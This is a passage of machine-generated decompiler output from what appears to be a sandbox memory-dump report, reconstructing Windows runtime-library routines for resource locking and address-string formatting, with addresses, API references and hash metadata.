                                                                                                                                                      												_t56 =  *(_t96 + 0x28);
                                                                                                                                                      												goto L3;
                                                                                                                                                      											}
                                                                                                                                                      										} else {
                                                                                                                                                      											_t107 =  *_t119;
                                                                                                                                                      											__eflags = _t107;
                                                                                                                                                      											if(__eflags > 0) {
                                                                                                                                                      												while(1) {
                                                                                                                                                      													_t81 = _t107;
                                                                                                                                                      													asm("lock cmpxchg [edi], esi");
                                                                                                                                                      													__eflags = _t81 - _t107;
                                                                                                                                                      													if(_t81 == _t107) {
                                                                                                                                                      														break;
                                                                                                                                                      													}
                                                                                                                                                      													_t107 = _t81;
                                                                                                                                                      													__eflags = _t81;
                                                                                                                                                      													if(_t81 > 0) {
                                                                                                                                                      														continue;
                                                                                                                                                      													}
                                                                                                                                                      													break;
                                                                                                                                                      												}
                                                                                                                                                      												_t56 = _a4;
                                                                                                                                                      												__eflags = _t107;
                                                                                                                                                      											}
                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                      												while(1) {
                                                                                                                                                      													L3:
                                                                                                                                                      													__eflags = _t56;
                                                                                                                                                      													if(_t56 != 0) {
                                                                                                                                                      														goto L32;
                                                                                                                                                      													}
                                                                                                                                                      													_t107 = _t107 | 0xffffffff;
                                                                                                                                                      													_t56 = 0;
                                                                                                                                                      													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                      													__eflags = 0;
                                                                                                                                                      													if(0 != 0) {
                                                                                                                                                      														continue;
                                                                                                                                                      													} else {
                                                                                                                                                      														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                      														return 1;
                                                                                                                                                      													}
                                                                                                                                                      													goto L59;
                                                                                                                                                      												}
                                                                                                                                                      												continue;
                                                                                                                                                      											} else {
                                                                                                                                                      												goto L40;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										goto L59;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = 0;
                                                                                                                                                      									return 0;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t115 =  *(_t96 + 0x28);
                                                                                                                                                      									continue;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_t106 =  *_t49;
                                                                                                                                                      								__eflags = _t106;
                                                                                                                                                      								if(__eflags > 0) {
                                                                                                                                                      									while(1) {
                                                                                                                                                      										_t93 = _t106;
                                                                                                                                                      										asm("lock cmpxchg [edi], esi");
                                                                                                                                                      										__eflags = _t93 - _t106;
                                                                                                                                                      										if(_t93 == _t106) {
                                                                                                                                                      											break;
                                                                                                                                                      										}
                                                                                                                                                      										_t106 = _t93;
                                                                                                                                                      										__eflags = _t93;
                                                                                                                                                      										if(_t93 > 0) {
                                                                                                                                                      											continue;
                                                                                                                                                      										}
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = _t106;
                                                                                                                                                      								}
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									continue;
                                                                                                                                                      								} else {
                                                                                                                                                      									goto L23;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						goto L59;
                                                                                                                                                      					}
                                                                                                                                                      					_t84 = _t115;
                                                                                                                                                      					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                      					__eflags = _t84 - _t115;
                                                                                                                                                      					if(_t84 != _t115) {
                                                                                                                                                      						_t115 = _t84;
                                                                                                                                                      						goto L7;
                                                                                                                                                      					} else {
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				L59:
                                                                                                                                                      			}
                                                                                                                                                      0x01fd228a
                                                                                                                                                      0x01fd228d
                                                                                                                                                      0x01fd228f
                                                                                                                                                      0x01fd22bc
                                                                                                                                                      0x01fd22bc
                                                                                                                                                      0x01fd22bc
                                                                                                                                                      0x01fd22be
                                                                                                                                                      0x01fd22c4
                                                                                                                                                      0x01fd22cc
                                                                                                                                                      0x01fd22d0
                                                                                                                                                      0x01fd22d6
                                                                                                                                                      0x01fd22d7
                                                                                                                                                      0x01fd22da
                                                                                                                                                      0x01fd22df
                                                                                                                                                      0x01fd22e4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22e6
                                                                                                                                                      0x01fd22e9
                                                                                                                                                      0x01fd22f4
                                                                                                                                                      0x01fd22f9
                                                                                                                                                      0x01fd22fa
                                                                                                                                                      0x01fd2305
                                                                                                                                                      0x01fd2314
                                                                                                                                                      0x01fd2319
                                                                                                                                                      0x01fd231a
                                                                                                                                                      0x01fd231d
                                                                                                                                                      0x01fd2320
                                                                                                                                                      0x01fd2323
                                                                                                                                                      0x01fd2323
                                                                                                                                                      0x01fd2328
                                                                                                                                                      0x01fd232d
                                                                                                                                                      0x01fd232f
                                                                                                                                                      0x01fd2331
                                                                                                                                                      0x01fd2336
                                                                                                                                                      0x01fd2336
                                                                                                                                                      0x01fd233b
                                                                                                                                                      0x01fd233d
                                                                                                                                                      0x01fd2350
                                                                                                                                                      0x01fd2351
                                                                                                                                                      0x01fd2356
                                                                                                                                                      0x01fd2359
                                                                                                                                                      0x01fd2359
                                                                                                                                                      0x01fd235b
                                                                                                                                                      0x01fd235d
                                                                                                                                                      0x01f95367
                                                                                                                                                      0x01f9536b
                                                                                                                                                      0x01f95372
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd2363
                                                                                                                                                      0x01fd2363
                                                                                                                                                      0x01fd2369
                                                                                                                                                      0x01fd236a
                                                                                                                                                      0x01fd236c
                                                                                                                                                      0x01fd2371
                                                                                                                                                      0x01fd2373
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd2379
                                                                                                                                                      0x01fd2379
                                                                                                                                                      0x01fd237a
                                                                                                                                                      0x01fd237f
                                                                                                                                                      0x01fd237f
                                                                                                                                                      0x01fd2385
                                                                                                                                                      0x01fd2386
                                                                                                                                                      0x01fd2389
                                                                                                                                                      0x01fd238e
                                                                                                                                                      0x01fd2390
                                                                                                                                                      0x01f95378
                                                                                                                                                      0x01f9537c
                                                                                                                                                      0x01fd2396
                                                                                                                                                      0x01fd2396
                                                                                                                                                      0x01fd2397
                                                                                                                                                      0x01fd239c
                                                                                                                                                      0x01fd23a2
                                                                                                                                                      0x01fd23a3
                                                                                                                                                      0x01fd23a6
                                                                                                                                                      0x01fd23ab
                                                                                                                                                      0x01fd23ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd23b3
                                                                                                                                                      0x01fd23b3
                                                                                                                                                      0x01fd23b4
                                                                                                                                                      0x01fd23b9
                                                                                                                                                      0x01fd23ba
                                                                                                                                                      0x01fd23ba
                                                                                                                                                      0x01fd23bc
                                                                                                                                                      0x01fd23bf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc9153
                                                                                                                                                      0x01fc9158
                                                                                                                                                      0x01fc915a
                                                                                                                                                      0x01fc915e
                                                                                                                                                      0x01fc9160
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc9166
                                                                                                                                                      0x01fc9166
                                                                                                                                                      0x01fc9171
                                                                                                                                                      0x01fc9176
                                                                                                                                                      0x01fc9176
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc9160
                                                                                                                                                      0x01fd23c6
                                                                                                                                                      0x01fd23ce
                                                                                                                                                      0x01fd23d7
                                                                                                                                                      0x01fd23d7
                                                                                                                                                      0x01fd23ad
                                                                                                                                                      0x01fd2390
                                                                                                                                                      0x01fd2373
                                                                                                                                                      0x01fd233f
                                                                                                                                                      0x01fd233f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd233f
                                                                                                                                                      0x01fd2291
                                                                                                                                                      0x01fd2291
                                                                                                                                                      0x01fd2293
                                                                                                                                                      0x01fd2295
                                                                                                                                                      0x01fd229a
                                                                                                                                                      0x01fd22a1
                                                                                                                                                      0x01fd22a3
                                                                                                                                                      0x01fd22a7
                                                                                                                                                      0x01fd22a9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22ab
                                                                                                                                                      0x01fd22ad
                                                                                                                                                      0x01fd22af
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22af
                                                                                                                                                      0x01fd22b1
                                                                                                                                                      0x01fd22b4
                                                                                                                                                      0x01fd22b4
                                                                                                                                                      0x01fd22b6
                                                                                                                                                      0x01f953be
                                                                                                                                                      0x01f953be
                                                                                                                                                      0x01f953be
                                                                                                                                                      0x01f953c0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f953cb
                                                                                                                                                      0x01f953ce
                                                                                                                                                      0x01f953d0
                                                                                                                                                      0x01f953d4
                                                                                                                                                      0x01f953d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f953d8
                                                                                                                                                      0x01f953e3
                                                                                                                                                      0x01f953ea
                                                                                                                                                      0x01f953ea
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f953d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22b6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd228f
                                                                                                                                                      0x01fd2349
                                                                                                                                                      0x01fd234d
                                                                                                                                                      0x01fd2251
                                                                                                                                                      0x01fd2251
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd2251
                                                                                                                                                      0x01fd21a4
                                                                                                                                                      0x01fd21a4
                                                                                                                                                      0x01fd21a6
                                                                                                                                                      0x01fd21a8

                                                                                                                                                      APIs
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FD2206
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                      • API String ID: 885266447-4236105082
                                                                                                                                                      • Opcode ID: 7e14a8a8b044ece05c1bbcde080f85da3cc211bfb93e709a6af9893f63a29573
                                                                                                                                                      • Instruction ID: dca7bca31cbd74be4376a8577c9ec816dd77d71fdfe7769e689f4a2a8b611fdd
                                                                                                                                                      • Opcode Fuzzy Hash: 7e14a8a8b044ece05c1bbcde080f85da3cc211bfb93e709a6af9893f63a29573
                                                                                                                                                      • Instruction Fuzzy Hash: 19512835B00212ABEB15CE29CCC1FA673AAAF94721F25825DFD55DB285D923EC4287D0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                      			E01FB14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				char _v10;
                                                                                                                                                      				char _v140;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int _t24;
                                                                                                                                                      				void* _t26;
                                                                                                                                                      				signed int _t29;
                                                                                                                                                      				signed int _t34;
                                                                                                                                                      				signed int _t40;
                                                                                                                                                      				intOrPtr _t45;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				intOrPtr* _t52;
                                                                                                                                                      				void* _t54;
                                                                                                                                                      				signed int _t57;
                                                                                                                                                      				void* _t58;
                                                                                                                                                      
                                                                                                                                                      				_t51 = __edx;
                                                                                                                                                      				_t24 =  *0x2052088; // 0x774e8a49
                                                                                                                                                      				_v8 = _t24 ^ _t57;
                                                                                                                                                      				_t45 = _a16;
                                                                                                                                                      				_t53 = _a4;
                                                                                                                                                      				_t52 = _a20;
                                                                                                                                                      				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                      					L10:
                                                                                                                                                      					_t26 = 0xc000000d;
                                                                                                                                                      				} else {
                                                                                                                                                      					if(_t45 == 0) {
                                                                                                                                                      						if( *_t52 == _t45) {
                                                                                                                                                      							goto L3;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L10;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						L3:
                                                                                                                                                      						_t28 =  &_v140;
                                                                                                                                                      						if(_a12 != 0) {
                                                                                                                                                      							_push("[");
                                                                                                                                                      							_push(0x41);
                                                                                                                                                      							_push( &_v140);
                                                                                                                                                      							_t29 = E01FA7707();
                                                                                                                                                      							_t58 = _t58 + 0xc;
                                                                                                                                                      							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                      						}
                                                                                                                                                      						_t54 = E01FB13CB(_t53, _t28);
                                                                                                                                                      						if(_a8 != 0) {
                                                                                                                                                      							_t34 = E01FA7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                      							_t58 = _t58 + 0x10;
                                                                                                                                                      							_t54 = _t54 + _t34 * 2;
                                                                                                                                                      						}
                                                                                                                                                      						if(_a12 != 0) {
                                                                                                                                                      							_t40 = E01FA7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                      							_t58 = _t58 + 0x10;
                                                                                                                                                      							_t54 = _t54 + _t40 * 2;
                                                                                                                                                      						}
                                                                                                                                                      						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                      						 *_t52 = _t53;
                                                                                                                                                      						if( *_t52 < _t53) {
                                                                                                                                                      							goto L10;
                                                                                                                                                      						} else {
                                                                                                                                                      							E01F72340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                      							_t26 = 0;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return E01F7E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • ___swprintf_l.LIBCMT ref: 01FDEA22
                                                                                                                                                        • Part of subcall function 01FB13CB: ___swprintf_l.LIBCMT ref: 01FB146B
                                                                                                                                                        • Part of subcall function 01FB13CB: ___swprintf_l.LIBCMT ref: 01FB1490
                                                                                                                                                      • ___swprintf_l.LIBCMT ref: 01FB156D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                                                      • Opcode ID: c28f0c1e75e705fd1cc2c86c8c8257c98d578d6d30fde97edb8baa52d93be2a1
                                                                                                                                                      • Instruction ID: 0587b2148e4e7bb3f44ec491d290a49f399274eacb7b5176be005ba454a4dcb8
                                                                                                                                                      • Opcode Fuzzy Hash: c28f0c1e75e705fd1cc2c86c8c8257c98d578d6d30fde97edb8baa52d93be2a1
                                                                                                                                                      • Instruction Fuzzy Hash: 0921F572D0021ADBDB21EE59DC90AEF77ACBF50310F484116ED46D3100DB76EA588BE1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 45%
                                                                                                                                                      			E01F953A5(signed int _a4, char _a8) {
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int _t32;
                                                                                                                                                      				signed int _t37;
                                                                                                                                                      				signed int _t40;
                                                                                                                                                      				signed int _t42;
                                                                                                                                                      				void* _t45;
                                                                                                                                                      				intOrPtr _t46;
                                                                                                                                                      				void* _t48;
                                                                                                                                                      				signed int _t49;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				signed int _t57;
                                                                                                                                                      				signed int _t64;
                                                                                                                                                      				signed int _t71;
                                                                                                                                                      				void* _t74;
                                                                                                                                                      				intOrPtr _t78;
                                                                                                                                                      				signed int* _t79;
                                                                                                                                                      				void* _t85;
                                                                                                                                                      				signed int _t86;
                                                                                                                                                      				signed int _t92;
                                                                                                                                                      				void* _t104;
                                                                                                                                                      				void* _t105;
                                                                                                                                                      
                                                                                                                                                      				_t64 = _a4;
                                                                                                                                                      				_t32 =  *(_t64 + 0x28);
                                                                                                                                                      				_t71 = _t64 + 0x28;
                                                                                                                                                      				_push(_t92);
                                                                                                                                                      				if(_t32 < 0) {
                                                                                                                                                      					_t78 =  *[fs:0x18];
                                                                                                                                                      					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                      					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                      						goto L3;
                                                                                                                                                      					} else {
                                                                                                                                                      						__eflags = _t32 | 0xffffffff;
                                                                                                                                                      						asm("lock xadd [ecx], eax");
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					L3:
                                                                                                                                                      					_push(_t86);
                                                                                                                                                      					while(1) {
                                                                                                                                                      						L4:
                                                                                                                                                      						__eflags = _t32;
                                                                                                                                                      						if(_t32 == 0) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _a8;
                                                                                                                                                      						if(_a8 == 0) {
                                                                                                                                                      							__eflags = 0;
                                                                                                                                                      							return 0;
                                                                                                                                                      						} else {
                                                                                                                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                      							_t79 = _t64 + 0x24;
                                                                                                                                                      							_t71 = 1;
                                                                                                                                                      							asm("lock xadd [eax], ecx");
                                                                                                                                                      							_t32 =  *(_t64 + 0x28);
                                                                                                                                                      							_a4 = _t32;
                                                                                                                                                      							__eflags = _t32;
                                                                                                                                                      							if(_t32 != 0) {
                                                                                                                                                      								L19:
                                                                                                                                                      								_t86 = 0;
                                                                                                                                                      								__eflags = 0;
                                                                                                                                                      								while(1) {
                                                                                                                                                      									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                      									asm("sbb esi, esi");
                                                                                                                                                      									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x020501c0;
                                                                                                                                                      									_push(_t92);
                                                                                                                                                      									_push(0);
                                                                                                                                                      									_t37 = E01F6F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                      									__eflags = _t37 - 0x102;
                                                                                                                                                      									if(_t37 != 0x102) {
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									_t71 =  *(_t92 + 4);
                                                                                                                                                      									_t85 =  *_t92;
                                                                                                                                                      									_t51 = E01FB4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                      									_push(_t85);
                                                                                                                                                      									_push(_t51);
                                                                                                                                                      									E01FC3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                      									E01FC3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                      									_t86 = _t86 + 1;
                                                                                                                                                      									_t105 = _t104 + 0x28;
                                                                                                                                                      									__eflags = _t86 - 2;
                                                                                                                                                      									if(__eflags > 0) {
                                                                                                                                                      										E01FF217A(_t71, __eflags, _t64);
                                                                                                                                                      									}
                                                                                                                                                      									_push("RTL: Re-Waiting\n");
                                                                                                                                                      									_push(0);
                                                                                                                                                      									_push(0x65);
                                                                                                                                                      									E01FC3F92();
                                                                                                                                                      									_t104 = _t105 + 0xc;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _t37;
                                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                                      									_push(_t37);
                                                                                                                                                      									E01FB3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                      									asm("int3");
                                                                                                                                                      									_t40 =  *_t71;
                                                                                                                                                      									 *_t71 = 0;
                                                                                                                                                      									__eflags = _t40;
                                                                                                                                                      									if(_t40 == 0) {
                                                                                                                                                      										L1:
                                                                                                                                                      										_t42 = E01F95384(_t92 + 0x24);
                                                                                                                                                      										if(_t42 != 0) {
                                                                                                                                                      											goto L31;
                                                                                                                                                      										} else {
                                                                                                                                                      											goto L2;
                                                                                                                                                      										}
                                                                                                                                                      									} else {
                                                                                                                                                      										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                      										_push( &_a4);
                                                                                                                                                      										_push(_t40);
                                                                                                                                                      										_t49 = E01F6F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                      										__eflags = _t49;
                                                                                                                                                      										if(__eflags >= 0) {
                                                                                                                                                      											goto L1;
                                                                                                                                                      										} else {
                                                                                                                                                      											_push(_t49);
                                                                                                                                                      											E01FB3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                      											L31:
                                                                                                                                                      											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                      											_push( &_a4);
                                                                                                                                                      											_push(1);
                                                                                                                                                      											_t42 = E01F6F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                      											__eflags = _t42;
                                                                                                                                                      											if(__eflags >= 0) {
                                                                                                                                                      												L2:
                                                                                                                                                      												return _t42;
                                                                                                                                                      											} else {
                                                                                                                                                      												_push(_t42);
                                                                                                                                                      												E01FB3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                      												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                      												_push( &_a4);
                                                                                                                                                      												_push(1);
                                                                                                                                                      												_t42 = E01F6F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                      												__eflags = _t42;
                                                                                                                                                      												if(__eflags >= 0) {
                                                                                                                                                      													goto L2;
                                                                                                                                                      												} else {
                                                                                                                                                      													_push(_t42);
                                                                                                                                                      													_t45 = E01FB3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                      													asm("int3");
                                                                                                                                                      													while(1) {
                                                                                                                                                      														_t74 = _t45;
                                                                                                                                                      														__eflags = _t45 - 1;
                                                                                                                                                      														if(_t45 != 1) {
                                                                                                                                                      															break;
                                                                                                                                                      														}
                                                                                                                                                      														_t86 = _t86 | 0xffffffff;
                                                                                                                                                      														_t45 = _t74;
                                                                                                                                                      														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                      														__eflags = _t45 - _t74;
                                                                                                                                                      														if(_t45 != _t74) {
                                                                                                                                                      															continue;
                                                                                                                                                      														} else {
                                                                                                                                                      															_t46 =  *[fs:0x18];
                                                                                                                                                      															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                      															return _t46;
                                                                                                                                                      														}
                                                                                                                                                      														goto L38;
                                                                                                                                                      													}
                                                                                                                                                      													E01F95329(_t74, _t92);
                                                                                                                                                      													_push(1);
                                                                                                                                                      													_t48 = E01F953A5(_t92);
                                                                                                                                                      													return _t48;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									_t32 =  *(_t64 + 0x28);
                                                                                                                                                      									continue;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_t71 =  *_t79;
                                                                                                                                                      								__eflags = _t71;
                                                                                                                                                      								if(__eflags > 0) {
                                                                                                                                                      									while(1) {
                                                                                                                                                      										_t57 = _t71;
                                                                                                                                                      										asm("lock cmpxchg [edi], esi");
                                                                                                                                                      										__eflags = _t57 - _t71;
                                                                                                                                                      										if(_t57 == _t71) {
                                                                                                                                                      											break;
                                                                                                                                                      										}
                                                                                                                                                      										_t71 = _t57;
                                                                                                                                                      										__eflags = _t57;
                                                                                                                                                      										if(_t57 > 0) {
                                                                                                                                                      											continue;
                                                                                                                                                      										}
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									_t32 = _a4;
                                                                                                                                                      									__eflags = _t71;
                                                                                                                                                      								}
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									continue;
                                                                                                                                                      								} else {
                                                                                                                                                      									goto L19;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						goto L38;
                                                                                                                                                      					}
                                                                                                                                                      					_t71 = _t71 | 0xffffffff;
                                                                                                                                                      					_t32 = 0;
                                                                                                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                      					__eflags = 0;
                                                                                                                                                      					if(0 != 0) {
                                                                                                                                                      						goto L4;
                                                                                                                                                      					} else {
                                                                                                                                                      						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				L38:
                                                                                                                                                      			}


























                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22ab
                                                                                                                                                      0x01fd22ad
                                                                                                                                                      0x01fd22af
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22af
                                                                                                                                                      0x01fd22b1
                                                                                                                                                      0x01fd22b4
                                                                                                                                                      0x01fd22b4
                                                                                                                                                      0x01fd22b6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22b6
                                                                                                                                                      0x01fd228f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd226d
                                                                                                                                                      0x01f953cb
                                                                                                                                                      0x01f953ce
                                                                                                                                                      0x01f953d0
                                                                                                                                                      0x01f953d4
                                                                                                                                                      0x01f953d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f953d8
                                                                                                                                                      0x01f953e3
                                                                                                                                                      0x01f953ea
                                                                                                                                                      0x01f953ea
                                                                                                                                                      0x01f953d6
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FD22F4
                                                                                                                                                      Strings
                                                                                                                                                      • RTL: Re-Waiting, xrefs: 01FD2328
                                                                                                                                                      • RTL: Resource at %p, xrefs: 01FD230B
                                                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01FD22FC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                      • API String ID: 885266447-871070163
                                                                                                                                                      • Opcode ID: 7511a732a47184f58b5645fc75e46045e6560067b854e1584e3e8330e8d2b8c7
